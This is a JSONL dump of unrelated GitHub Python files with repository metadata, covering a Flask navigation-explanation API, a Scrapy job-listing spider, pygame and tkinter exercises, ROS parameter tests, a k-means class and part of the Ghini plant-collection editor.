hidden_seq.append(ht.unsqueeze(Dim.batch))\n hidden_seq = torch.cat(hidden_seq, dim=Dim.batch)\n # reshape from shape (sequence, batch, feature) to (batch, sequence, feature)\n hidden_seq = hidden_seq.transpose(Dim.batch, Dim.seq).contiguous()\n return hidden_seq, (ht, Ct)\n","repo_name":"HallerPatrick/GERPT","sub_path":"src/models/mogrifier_lstm.py","file_name":"mogrifier_lstm.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2192090047","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport numpy as np\n\nfrom .src.final_functions import getPathExplanation, getDesiredPathFromWaypoint, getAnytimeAlgorithmData, variablesToUseFix, calculateShortestPath\n\napp = Flask(__name__)\ncors = CORS(app)\n\n@app.route('/1/', methods = ['GET'])\ndef get_explanations1():\n np.random.seed(0)\n\n desired_path = [int(n) for n in request.args.getlist('desired_path')]\n variablesToUse = [n for n in request.args.getlist('variablesToUse')]\n variablesToUseFix(variablesToUse)\n \n shortest_path, explanations, optimalValue, changedEdges = getPathExplanation(desired_path, variablesToUse)\n \n return jsonify({ 'shortest_path': shortest_path, 'explanations': explanations, 'changed_edges': changedEdges })\n\n@app.route('/2/', methods = ['GET'])\ndef get_explanations2():\n np.random.seed(0)\n \n nodes = [int(n) for n in request.args.getlist('nodes')]\n variablesToUse = [n for n in request.args.getlist('variablesToUse')]\n variablesToUseFix(variablesToUse)\n \n print(nodes)\n \n # calculate the desired path, and then do the same as before.\n # get closest nodes in our graph, to the nodes given\n desired_path = getDesiredPathFromWaypoint(nodes, variablesToUse)\n \n print(desired_path)\n if (len(desired_path) > 0):\n shortest_path, explanations, optimalValue, changedEdges = getPathExplanation(desired_path, variablesToUse)\n\n \n return jsonify({ 'desired_path': desired_path, 'shortest_path': shortest_path, 'explanations': explanations, 'changed_edges': changedEdges })\n\n\n@app.route('/3/', methods = ['GET'])\ndef get_explanations3():\n np.random.seed(0)\n \n nodes = [int(n) for n in request.args.getlist('nodes')]\n variablesToUse = [n for n in request.args.getlist('variablesToUse')]\n variablesToUseFix(variablesToUse)\n \n print(nodes)\n \n # Apply the anytime algorithm and get SP\n shortest_path, desired_path, explanations, optimalValues, changedEdges = getAnytimeAlgorithmData(nodes, variablesToUse)\n \n return jsonify({ 'desired_path': desired_path, 'shortest_path': shortest_path, 'explanations': explanations, 'changed_edges': changedEdges })\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n \n \n \n@app.route('/sp/', methods = ['GET'])\ndef get_shortest_path():\n np.random.seed(0)\n \n nodes = [int(n) for n in request.args.getlist('nodes')]\n \n print(nodes)\n \n source = nodes[0]\n target = nodes[len(nodes) - 1]\n \n shortest_path = calculateShortestPath(source, target)\n\n \n return jsonify({ 'shortest_path': shortest_path })\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"khalid-alsheeb/explainable-road-navigation","sub_path":"website/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18232592238","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import TencentItem\nfrom scrapy.linkextractors import LinkExtractor\n\n\nclass ZpTxSpider(scrapy.Spider):\n name = 'zp_tx'\n allowed_domains = ['hr.tencent.com']\n start_urls = ['https://hr.tencent.com/position.php?lid=&tid=&keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E8%AF%8D&start=0']\n\n def parse(self, response):\n position_list = response.css(\"table.tablelist tr:not(:first-child):not(:last-child)\")\n for position in position_list:\n item = TencentItem()\n item['job_titile'] = position.css('td.l a::text').extract_first()\n item['link'] = response.urljoin(position.css('td.l a::attr(href)').extract_first())\n item['category'] = position.css('td:nth-child(2)::text').extract_first()\n item['number'] = position.css('td:nth-child(3)::text').extract_first()\n item['place'] = position.css('td:nth-child(4)::text').extract_first()\n item['time'] = position.css('td:nth-child(5)::text').extract_first()\n yield item\n\n '''\n next_url = response.css('table.tablelist tr.f div.pagenav a:nth-last-child(2)::attr(href)').extract_first()\n if next_url:\n next_page = response.urljoin(next_url)\n yield scrapy.Request(next_page, callback=self.parse)\n '''\n le = LinkExtractor(restrict_css='table.tablelist tr.f div.pagenav a:nth-last-child(2)')\n next_link = le.extract_links(response)\n if next_link:\n next_page = next_link[0].url\n yield scrapy.Request(next_page, callback=self.parse)\n","repo_name":"onmyway4212/scrapy","sub_path":"tencent/tencent/spiders/zp_tx.py","file_name":"zp_tx.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6024393076","text":"import os\nimport subprocess\nimport boto3\n\nimport socket\n\nip_address = socket.gethostbyname(socket.gethostname())\n\nsubprocess.call(['pip', 'install', 'boto3'])\n\nos.environ['AWS_ACCESS_KEY_ID'] = ''\nos.environ['AWS_SECRET_ACCESS_KEY'] = ''\nos.environ['AWS_REGION'] = 'us-east-1'\n\n\nimport boto3\nclient = boto3.client('lookoutmetrics')\nresponse = client.create_anomaly_detector(\n AnomalyDetectorName='detector1',\n AnomalyDetectorDescription='testing detector',\n AnomalyDetectorConfig={\n 'AnomalyDetectorFrequency': 'P1D'\n },\n # KmsKeyArn='string',\n Tags={\n 'Name': 'detector'\n }\n)","repo_name":"andalike/terraform-python","sub_path":"code-lookout.py","file_name":"code-lookout.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73345103148","text":"from pyfp.pipe import Pipe\n\ndef test_function_pipe():\n pipe_res = Pipe(3).to(max, 4).get()\n\n nonpipe_res = max(3, 4)\n \n assert pipe_res == nonpipe_res\n\ndef test_method_pipe():\n pipe_res = Pipe(\"hello, world!\").to(str.upper).to(list).get()\n\n nonpipe_res = list(\"hello, world!\".upper())\n\n assert pipe_res == nonpipe_res\n\ndef test_method_front_pipe():\n foo = {\n 1: 2,\n 3: 4,\n 5: 6\n }\n\n pipe_res = Pipe(foo).to_first(dict.get, 3).get()\n nonpipe_res = foo.get(3)\n\n assert pipe_res == nonpipe_res\n\ndef test_complex_pipe():\n ls = [97, 98, 99, 100]\n\n pipe_res = Pipe(ls) \\\n .to(filter, lambda x: x % 2 == 0) \\\n .to(map, lambda x: chr(x)) \\\n .to(map, lambda x: x.upper()) \\\n .to(list) \\\n .get()\n\n res = list(\n map(\n lambda x: x.upper(), \n map(\n lambda x: chr(x), \n filter(\n lambda x: x % 2 == 0, \n ls\n )\n )\n )\n )\n\n assert pipe_res == res\n\ndef test_invald_argument_type():\n try:\n Pipe(3).to(3)\n assert False\n except TypeError:\n assert True","repo_name":"brettkolodny/pyfp","sub_path":"tests/test_pipe.py","file_name":"test_pipe.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12340846731","text":"import os\nimport sys \nimport unittest\nimport time\n \nfrom subprocess import Popen, PIPE, check_call, call\n\nimport rosparam\n\ndef get_test_path():\n return os.path.abspath(os.path.join(os.path.dirname(__file__)))\n\nclass TestRosparamOffline(unittest.TestCase):\n\n def setUp(self):\n pass\n\n ## test that the rosmsg command works\n def test_cmd_help(self):\n cmd = 'rosparam'\n sub = ['set', 'get', 'load', 'dump', 'delete', 'list']\n \n output = Popen([cmd], stdout=PIPE).communicate()[0]\n self.assert_('Commands' in output.decode(), output)\n output = Popen([cmd, '-h'], stdout=PIPE).communicate()[0]\n self.assert_('Commands' in output.decode())\n\n for c in sub:\n # make sure command is in usage statement\n self.assert_(\"%s %s\"%(cmd, c) in output.decode())\n \n for c in sub:\n output = Popen([cmd, c, '-h'], stdout=PIPE, stderr=PIPE).communicate()\n self.assert_(\"Usage:\" in output[0].decode(), \"%s\\n%s\" % (output, c))\n self.assert_(\"%s %s\"%(cmd, c) in output[0].decode(), \"%s: %s\" % (c, output[0].decode()))\n \n # test no args on commands that require args\n for c in ['set', 'get', 'load', 'delete']:\n output = Popen([cmd, c], stdout=PIPE, stderr=PIPE).communicate()\n self.assert_(\"Usage:\" in output[0].decode() or \"Usage:\" in output[1].decode(), \"%s\\n%s\"%(output, c))\n self.assert_(\"%s %s\"%(cmd, c) in output[1].decode())\n \n def test_offline(self):\n cmd = 'rosparam'\n\n # point at a different 'master'\n env = os.environ.copy()\n env['ROS_MASTER_URI'] = 'http://localhost:11312'\n kwds = { 'env': env, 'stdout': PIPE, 'stderr': PIPE}\n\n msg = \"ERROR: Unable to communicate with master!\" + os.linesep\n\n output = Popen([cmd, 'list'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n output = Popen([cmd, 'set', 'foo', '1.0'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n output = Popen([cmd, 'get', 'foo'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n # have to test with actual file to avoid error\n path = os.path.join(get_test_path(), 'test.yaml')\n output = Popen([cmd, 'load', path], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n\n # test with file that does not exist\n output = Popen([cmd, 'load', 'fake.yaml'], **kwds).communicate()\n self.assertEquals('ERROR: file [fake.yaml] does not exist' + os.linesep, output[1].decode())\n \n output = Popen([cmd, 'dump', 'foo.yaml'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n output = Popen([cmd, 'delete', 'foo'], **kwds).communicate()\n self.assert_(output[1].decode().endswith(msg))\n \n","repo_name":"ros/ros_comm","sub_path":"test/test_rosparam/test/test_rosparam_command_line_offline.py","file_name":"test_rosparam_command_line_offline.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":712,"dataset":"github-code","pt":"37"} +{"seq_id":"43026480948","text":"import os\r\nimport pygame\r\n################################################################\r\n# 기본 초기화반드시 해야 하는 것들\r\n\r\npygame.init()#초기화(반드시 필요)\r\n\r\n#화면 크기 설정\r\nscreen_width = 640 #가로\r\nscreen_height = 480 #세로\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\n\r\n\r\n#화면 타이틀 설정\r\npygame.display.set_caption(\"Nado Pang\") #게임 이름\r\n\r\n#FPS\r\nclock = pygame.time.Clock()\r\n########################################################################\r\n\r\n# 1. 사용자 게임 초기화 (배경화면, 게임 이미지, 좌표, 속도, 폰트 등)\r\n\r\ncurrent_path = os.path.dirname(__file__) # 현재 파일의 위치 반환\r\nimage_path = os.path.join(current_path, \"images\") # images 폴더 위치 반환\r\n\r\n# 배경이미지 불러오기\r\nbackground = pygame.image.load(os.path.join(image_path, \"background.png\"))\r\n\r\n# 스테이지 만들기\r\nstage = pygame.image.load(os.path.join(image_path, \"stage.png\"))\r\nstage_size = stage.get_rect().size\r\nstage_height = stage_size[1] # 스테이지 높이 위에 캐릭터를 두기 위해 사용\r\n\r\n#캐릭터(스프라이트) 만들기\r\ncharacter = pygame.image.load(os.path.join(image_path, \"character.png\"))\r\ncharacter_size = character.get_rect().size\r\ncharacter_width = character_size[0]\r\ncharacter_height = character_size[1]\r\ncharacter_x_pos = (screen_width/2) - (character_width/2)\r\ncharacter_y_pos = screen_height - character_height - stage_height\r\n\r\n# 캐릭터 이동 반향\r\ncharacter_to_x = 0\r\n\r\n# 캐릭터 이동 속도\r\ncharacter_speed = 5\r\n\r\n# 무기 만들기\r\nweapon = pygame.image.load(os.path.join(image_path, \"weapon.png\"))\r\nweapon_size = weapon.get_rect().size\r\nweapon_width = weapon_size[0]\r\n\r\n# 무기는 한번에 여러발 발사 가능\r\nweapons =[]\r\n\r\n# 무기 속도\r\nweapon_speed = 10\r\n\r\n#적 enemy 캐릭터\r\n\r\n\r\n#이벤트 루프\r\nrunning = True # 게임이 진행중인가?\r\nwhile running:\r\n dt = clock.tick(60) # 게임화면의 초당 프레임 수 설정\r\n\r\n \r\n# 2.이벤트 처리 (키보드, 마우스 등)\r\n for event in pygame.event.get():#이벤트가 발생 하였는가?\r\n if event.type == pygame.QUIT: # 창이 닫히는 이벤트가 발생하였는가?\r\n running == False # 게임 진행중이 아님\r\n os.sys.exit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n character_to_x -=character_speed\r\n elif event.key == pygame.K_RIGHT:\r\n character_to_x += character_speed\r\n elif event.key == pygame.K_SPACE: # 무기 발사\r\n weapon_x_pos = character_x_pos + (character_width/2) - (weapon_width/2)\r\n weapon_y_pos = character_y_pos\r\n weapons.append([weapon_x_pos,weapon_y_pos])\r\n\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n character_to_x = 0\r\n\r\n\r\n# 3. 게임 캐릭터 위치 정의\r\n character_x_pos += character_to_x\r\n\r\n if character_x_pos < 0:\r\n character_x_pos = 0\r\n elif character_x_pos > screen_width - character_width:\r\n character_x_pos = screen_width - character_width\r\n\r\n # 무기 위치 조정\r\n # 예를 들어 발사 위치가 100,200 일 때 y값은 계속 줄어들며 변함\r\n # -> 180,160,120....\r\n # 이변 환 값들을 리스트로 묶어 처리\r\n\r\n weapons = [[w[0],w[1] - weapon_speed] for w in weapons] #무기 위치를 위로 올림\r\n\r\n # 천정에 닿은 무기 없애기\r\n weapons = [[w[0],w[1]] for w in weapons if w[1] > 0]# 천정에 닿지 않은 무기만 배열에 저장\r\n\r\n# 4. 충돌 처리\r\n\r\n\r\n\r\n# 5. 화면에 그리기\r\n screen.blit(background,(0,0)) #배경 그리기\r\n for weapon_x_pos, weapon_y_pos in weapons: # 발사된 무기 그려주기\r\n screen.blit(weapon, (weapon_x_pos,weapon_y_pos))\r\n screen.blit(stage,(0, screen_height-stage_height)) # 스테이지 그리기\r\n screen.blit(character, (character_x_pos, character_y_pos)) # 캐릭터 그리기\r\n \r\n \r\n pygame.display.update()\r\n\r\n# pygame 종료\r\npygame.quit()\r\n\r\n","repo_name":"kjunk624/development","sub_path":"PythonWorkspace/PythonEx/pygame_project/2_weapon_keyevent.py","file_name":"2_weapon_keyevent.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27786708208","text":"import tkinter as tk\n\n\nclass Calculator:\n def __init__(self, master):\n self.master = master\n master.title(\"Calculadora\")\n\n # Criar campo de entrada\n self.entry = tk.Entry(master, width=25, borderwidth=5, font=('Arial', 12))\n self.entry.grid(row=0, column=0, columnspan=4, padx=10, pady=10)\n\n # Criar botões\n buttons = [\n '7', '8', '9', '/',\n '4', '5', '6', '*',\n '1', '2', '3', '-',\n '0', '.', 'C', '+'\n ]\n r = 1\n c = 0\n for btn in buttons:\n command = lambda x=btn: self.handle_click(x)\n tk.Button(master, text=btn, width=5, height=2, command=command).grid(row=r, column=c, padx=5, pady=5)\n c += 1\n if c == 4:\n c = 0\n r += 1\n\n # Criar botão \"C\"\n tk.Button(master, text='C', width=5, height=2, command=lambda: self.entry.delete(0, tk.END)).grid(row=4, column=1, padx=5, pady=5)\n\n # Criar botão \"0\"\n tk.Button(master, text='0', width=5, height=2, command=lambda: self.entry.insert(tk.END, '0')).grid(row=4, column=0, padx=5, pady=5)\n\n # Criar botão \"=\"\n tk.Button(master, text='=', width=5, height=2, command=lambda: self.handle_click('=')).grid(row=4, column=1, padx=5, pady=5)\n\n def handle_click(self, key):\n if key == '=':\n try:\n result = eval(self.entry.get())\n self.entry.delete(0, tk.END)\n self.entry.insert(0, str(result))\n except:\n self.entry.delete(0, tk.END)\n self.entry.insert(0, \"Erro\")\n elif key == 'C':\n self.entry.delete(0, tk.END)\n else:\n self.entry.insert(tk.END, key)\n\n\nroot = tk.Tk()\ncalc = Calculator(root)\nroot.mainloop()\n","repo_name":"Deivid7x/Calculadora","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30275773345","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics.pairwise import cosine_distances, euclidean_distances\nfrom sklearn.base import BaseEstimator, ClusterMixin\nfrom tdigest import tdigest\n\n\nclass KMeansCosine(BaseEstimator, ClusterMixin):\n\n def __init__(self, n_clusters, iter=300, metric='euclidean'):\n self.n_clusters = n_clusters\n self.iter = iter\n self.metric = metric\n\n self.labels = []\n self.centers = []\n\n self.X = None\n\n def init_centers(self):\n return self.X[np.random.choice(self.X.shape[0], self.n_clusters, replace=False)]\n\n def assign_labels(self, centers):\n if self.metric == 'cosine':\n D = cosine_distances(self.X, centers)\n else:\n D = euclidean_distances(self.X, centers)\n return np.argmin(D, axis=1)\n\n def update_centers(self, labels):\n centers = np.zeros((self.n_clusters, self.X.shape[1]))\n for k in range(self.n_clusters):\n Xk = self.X[labels == k, :]\n centers[k, :] = np.mean(Xk, axis=0)\n return centers\n\n @staticmethod\n def has_converged(centers, new_centers):\n return (set([tuple(a) for a in centers]) ==\n set([tuple(a) for a in new_centers]))\n\n def fit(self, X, y=None):\n self.X = X\n self.centers = [self.init_centers()]\n self.labels = []\n it = 0\n while it <= self.iter:\n self.labels.append(self.assign_labels(self.centers[-1]))\n new_centers = self.update_centers(self.labels[-1])\n if self.has_converged(self.centers[-1], new_centers):\n break\n self.centers.append(new_centers)\n it += 1\n\n self.labels = self.labels[-1]\n self.centers = self.centers[-1]\n\n def fit_predict(self, X, y=None):\n self.fit(X, y)\n\n def distance(self):\n dist = []\n\n for l in set(self.labels):\n x = self.X[self.labels == l, :]\n if self.metric == 'cosine':\n D = cosine_distances(x, self.centers)\n else:\n D = euclidean_distances(x, self.centers)\n\n for d in D:\n dist.append(d[l])\n\n return dist\n\n def score(self, compression=100, q=0.8):\n t = tdigest.TDigest(compression)\n results = []\n\n for l in set(self.labels):\n x = self.X[self.labels == l, :]\n if self.metric == 'cosine':\n D = cosine_distances(x, self.centers)\n else:\n D = euclidean_distances(x, self.centers)\n\n for d in D:\n t.add(d[l])\n\n results.append(t.percentile(q))\n\n return results\n\n def display(self):\n if self.X.shape[1] != 2:\n return\n\n for l in set(self.labels):\n x = self.X[self.labels == l, :]\n plt.plot(x[:, 0], x[:, 1], 'o', markersize=4, alpha=.8)\n\n plt.axis('equal')\n plt.plot()\n plt.show()\n","repo_name":"kietdinh/people-wiki-recommendation","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34145193018","text":"from tensorflow.examples.tutorials.mnist import input_data\n\n# minst测试集\nmnist = input_data.read_data_sets('mnist/', one_hot=True)\n# 每次使用100条数据进行训练\nbatch_size = 100\n# 图像向量\nwidth = 28\nheight = 28\n# LSTM隐藏神经元数量\nrnn_size = 256\n# 输出层one-hot向量长度的\nout_size = 10\n","repo_name":"lpty/tensorflow_tutorial","sub_path":"mnistRnn/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"zh","doc_type":"code","stars":242,"dataset":"github-code","pt":"37"} +{"seq_id":"8584124535","text":"import datetime\nimport os\nimport sys\nimport weakref\n\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nfrom gi.repository import GLib\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\nfrom gi.repository import GdkPixbuf\n\nfrom random import random\nimport lxml.etree as etree\nfrom gi.repository import Pango\nfrom sqlalchemy.orm import object_mapper, object_session\nfrom sqlalchemy.orm.exc import UnmappedInstanceError\n\n\nimport bauble\nimport bauble.db as db\nfrom bauble.error import check\nimport bauble.paths as paths\nimport bauble.prefs as prefs\nimport bauble.utils as utils\nfrom bauble.error import CheckConditionError\n\n# TODO: create a generic date entry that can take a mask for the date format\n# see the date entries for the accession and accession source presenters\n\n\nclass ValidatorError(Exception):\n\n def __init__(self, msg):\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\nclass Validator(object):\n \"\"\"\n The interface that other validators should implement.\n \"\"\"\n\n def to_python(self, value):\n raise NotImplementedError\n\n\nfrom bauble.utils import parse_date\n\nclass DateValidator(Validator):\n \"\"\"\n Validate that string is parseable with dateutil\n \"\"\"\n def to_python(self, value):\n if not value:\n return None\n dayfirst = prefs.prefs[prefs.parse_dayfirst_pref]\n yearfirst = prefs.prefs[prefs.parse_yearfirst_pref]\n default_year = 1999\n default = datetime.date(default_year, 1, 1)\n try:\n value = parse_date(value, dayfirst=dayfirst,\n yearfirst=yearfirst, default=default)\n if value.year == default_year:\n raise ValueError\n except Exception as e:\n raise ValidatorError(str(e))\n return value\n\n\n# class DateTimeValidator(object):\n# pass\n\n\nclass StringOrNoneValidator(Validator):\n \"\"\"\n If the value is an empty string then return None, else return the\n str() of the value.\n \"\"\"\n\n def to_python(self, value):\n if value in ('', '', None):\n return None\n return str(value)\n\n\nclass UnicodeOrNoneValidator(Validator):\n \"\"\"\n If the value is an empty unicode string then return None, else\n return the unicode() of the value. The default encoding is\n 'utf-8'.\n \"\"\"\n def __init__(self, encoding='utf-8'):\n self.encoding = encoding\n\n def to_python(self, value):\n if value in ('', '', None):\n return None\n return utils.to_unicode(value, self.encoding)\n\n\nclass UnicodeOrEmptyValidator(Validator):\n \"\"\"\n If the value is an empty unicode string then return '', else\n return the unicode() of the value. The default encoding is\n 'utf-8'.\n \"\"\"\n def __init__(self, encoding='utf-8'):\n self.encoding = encoding\n\n def to_python(self, value):\n if not value.strip():\n return ''\n return utils.to_unicode(value, self.encoding)\n\n\nclass IntOrNoneStringValidator(Validator):\n \"\"\"\n If the value is an int, long or can be cast to int then return the\n number, else return None\n \"\"\"\n\n def to_python(self, value):\n if value is None or (isinstance(value, str) and value == ''):\n return None\n elif isinstance(value, int):\n return value\n try:\n return int(value)\n except Exception:\n raise ValidatorError('Could not convert value to int: %s (%s)'\n % (value, type(value)))\n\n\nclass FloatOrNoneStringValidator(Validator):\n \"\"\"\n If the value is an int, long, float or can be cast to float then\n return the number, else return None\n \"\"\"\n\n def to_python(self, value):\n if value is None or (isinstance(value, str) and value == ''):\n return None\n elif isinstance(value, (int, float)):\n return value\n try:\n return float(value)\n except Exception:\n raise ValidatorError('Could not convert value to float: %s (%s)'\n % (value, type(value)))\n\n\ndef default_completion_cell_data_func(column, renderer, model, treeiter, data=None):\n '''\n the default completion cell data function for\n GenericEditorView.attach_completions\n '''\n v = model[treeiter][0]\n renderer.set_property('markup', utils.to_unicode(v))\n\n\ndef default_completion_match_func(completion, key_string, treeiter):\n '''\n the default completion match function for\n GenericEditorView.attach_completions, does a case-insensitive string\n comparison of the the completions model[iter][0]\n '''\n value = completion.get_model()[treeiter][0]\n return str(value).lower().startswith(key_string.lower())\n\n\nclass GenericEditorView(object):\n \"\"\"\n A generic class meant (not) to be subclassed, to provide the view\n for the Ghini Model-View-Presenter pattern. The idea is that you\n subclass the Presenter alone, and that the View remains as 'stupid'\n as it is conceivable.\n\n The presenter should interact with the view by the sole interface,\n please consider all members of the view as private, this is\n particularly true for the ones having anything to do with GTK.\n\n :param filename: a Gtk.Builder UI definition\n\n :param parent: a Gtk.Window or subclass to use as the parent\n window, if parent=None then bauble.gui.window is used\n \"\"\"\n _tooltips = {}\n\n def __init__(self, filename, parent=None, root_widget_name=None):\n self.root_widget_name = root_widget_name\n builder = self.builder = Gtk.Builder()\n builder.add_from_file(filename)\n self.filename = filename\n self.widgets = utils.BuilderWidgets(builder)\n if parent:\n self.get_window().set_transient_for(parent)\n elif bauble.gui:\n self.get_window().set_transient_for(bauble.gui.window)\n self.response = None\n self.__attached_signals = []\n self.boxes = set()\n\n # set the tooltips...use Gtk.Tooltip api introducted in GTK+ 2.12\n for widget_name, markup in self._tooltips.items():\n try:\n self.widgets[widget_name].set_tooltip_markup(markup)\n except Exception as e:\n values = dict(widget_name=widget_name, exception=e)\n logger.debug(_('Couldn\\'t set the tooltip on widget '\n '%(widget_name)s\\n\\n%(exception)s') % values)\n\n try:\n window = self.get_window()\n except:\n window = None\n if window is not None:\n self.connect(window, 'delete-event', self.on_window_delete)\n if isinstance(window, Gtk.Dialog):\n self.connect(window, 'close', self.on_dialog_close)\n self.connect(window, 'response', self.on_dialog_response)\n self.box = set() # the top level, meant for warnings.\n\n def cancel_threads(self):\n pass\n\n def update(self):\n pass\n\n def run_file_chooser_dialog(\n self, text, parent, action, buttons, last_folder, target):\n \"\"\"create and run FileChooserDialog, then write result in target\n\n this is just a bit more than a wrapper. it adds 'last_folder', a\n string indicationg the location where to put the FileChooserDialog,\n and 'target', an Entry widget or its name.\n\n make sure you have a Gtk.ResponseType.ACCEPT button.\n\n \"\"\"\n chooser = Gtk.FileChooserDialog(text, parent, action, buttons)\n #chooser.set_do_overwrite_confirmation(True)\n #chooser.connect(\"confirm-overwrite\", confirm_overwrite_callback)\n try:\n if last_folder:\n chooser.set_current_folder(last_folder)\n if chooser.run() == Gtk.ResponseType.ACCEPT:\n filename = chooser.get_filename()\n if filename:\n self.widget_set_value(target, filename)\n except Exception as e:\n logger.warning(\"unhandled %s exception in editor.py: %s\" %\n (type(e), e))\n chooser.destroy()\n\n def run_entry_dialog(self, title, parent, flags, buttons, visible=True):\n d = Gtk.Dialog(title, parent, flags, buttons)\n d.set_default_response(Gtk.ResponseType.ACCEPT)\n d.set_default_size(250, -1)\n entry = Gtk.Entry()\n if visible is not True:\n entry.set_visibility(False)\n entry.connect(\"activate\",\n lambda entry: d.response(Gtk.ResponseType.ACCEPT))\n d.vbox.pack_start(entry, True, True, 0)\n d.show_all()\n d.run()\n user_reply = entry.get_text()\n d.destroy()\n return user_reply\n\n def run_message_dialog(self, msg, type=Gtk.MessageType.INFO,\n buttons=Gtk.ButtonsType.OK, parent=None):\n utils.message_dialog(msg, type, buttons, parent)\n\n def run_yes_no_dialog(self, msg, parent=None, yes_delay=-1):\n return utils.yes_no_dialog(msg, parent, yes_delay)\n\n def get_selection(self):\n '''return the selection in the graphic interface'''\n class EmptySelectionException(Exception):\n pass\n from bauble.view import SearchView\n view = bauble.gui.get_view()\n try:\n check(isinstance(view, SearchView))\n tree_view = view.results_view.get_model()\n check(tree_view is not None)\n except CheckConditionError:\n self.run_message_dialog(_('Search for something first.'))\n return\n\n return [row[0] for row in tree_view]\n\n def set_title(self, title):\n self.get_window().set_title(title)\n\n def set_icon(self, icon):\n self.get_window().set_icon(icon)\n\n def image_set_from_file(self, widget, value):\n widget = (isinstance(widget, Gtk.Widget)\n and widget\n or self.widgets[widget])\n widget.set_from_file(value)\n\n def set_label(self, widget_name, value):\n getattr(self.widgets, widget_name).set_markup(value)\n\n def close_boxes(self):\n while self.boxes:\n logger.debug('box is being forcibly removed')\n box = self.boxes.pop()\n self.widgets.remove_parent(box)\n box.destroy()\n\n def add_box(self, box):\n logger.debug('box is being added')\n self.boxes.add(box)\n\n def remove_box(self, box):\n logger.debug('box is being removed')\n if box in self.boxes:\n self.boxes.remove(box)\n self.widgets.remove_parent(box)\n box.destroy()\n else:\n logger.debug('box to be removed is not there')\n\n def add_message_box(self, message_box_type=utils.MESSAGE_BOX_INFO):\n \"\"\"add a message box to the message_box_parent container\n\n :param type: one of MESSAGE_BOX_INFO, MESSAGE_BOX_ERROR or\n MESSAGE_BOX_YESNO\n \"\"\"\n return utils.add_message_box(self.widgets.message_box_parent,\n message_box_type)\n\n def connect_signals(self, target):\n 'connect all signals declared in the glade file'\n if not hasattr(self, 'signals'):\n from lxml import etree\n doc = etree.parse(self.filename)\n self.signals = doc.xpath('//signal')\n for s in self.signals:\n try:\n handler = getattr(target, s.get('handler'))\n except AttributeError as text:\n logger.debug(\"AttributeError: %s\" % text)\n continue\n signaller = getattr(self.widgets, s.getparent().get('id'))\n handler_id = signaller.connect(s.get('name'), handler)\n self.__attached_signals.append((signaller, handler_id))\n\n def set_accept_buttons_sensitive(self, sensitive):\n '''set the sensitivity of all the accept/ok buttons\n\n '''\n for wname in self.accept_buttons:\n getattr(self.widgets, wname).set_sensitive(sensitive)\n\n def connect(self, obj, signal, callback, *args):\n \"\"\"\n Attach a signal handler for signal on obj. For more\n information see :meth:`GObject.connect_after`\n\n :param obj: An instance of a subclass of gobject that will\n receive the signal\n\n :param signal: the name of the signal the object will receive\n\n :param callback: the function or method to call the object\n receives the signal\n\n :param args: extra args to pass the the callback\n \"\"\"\n if isinstance(obj, str):\n obj = self.widgets[obj]\n sid = obj.connect(signal, callback, *args)\n self.__attached_signals.append((obj, sid))\n return sid\n\n def connect_after(self, obj, signal, callback, *args): # data=None):\n \"\"\"\n Attach a signal handler for signal on obj. For more\n information see :meth:`GObject.connect_after`\n\n :param obj: An instance of a subclass of gobject that will\n receive the signal\n\n :param signal: the name of the signal the object will receive\n\n :param callback: the function or method to call the object\n receives the signal\n\n :param args: extra args to pass the the callback\n \"\"\"\n if isinstance(obj, str):\n obj = self.widgets[obj]\n sid = obj.connect_after(signal, callback, *args)\n # if data:\n # sid = obj.connect_after(signal, callback, data)\n # else:\n # sid = obj.connect_after(signal, callback)\n self.__attached_signals.append((obj, sid))\n return sid\n\n def disconnect_all(self):\n \"\"\"\n Disconnects all the signal handlers attached with\n :meth:`GenericEditorView.connect` or\n :meth:`GenericEditorView.connect_after`\n \"\"\"\n logger.debug('GenericEditorView:disconnect_all')\n for obj, sid in self.__attached_signals:\n obj.disconnect(sid)\n del self.__attached_signals[:]\n\n def disconnect_widget_signals(self, widget):\n \"\"\"disconnect all signals attached to widget\"\"\"\n\n removed = []\n for obj, sid in self.__attached_signals:\n if 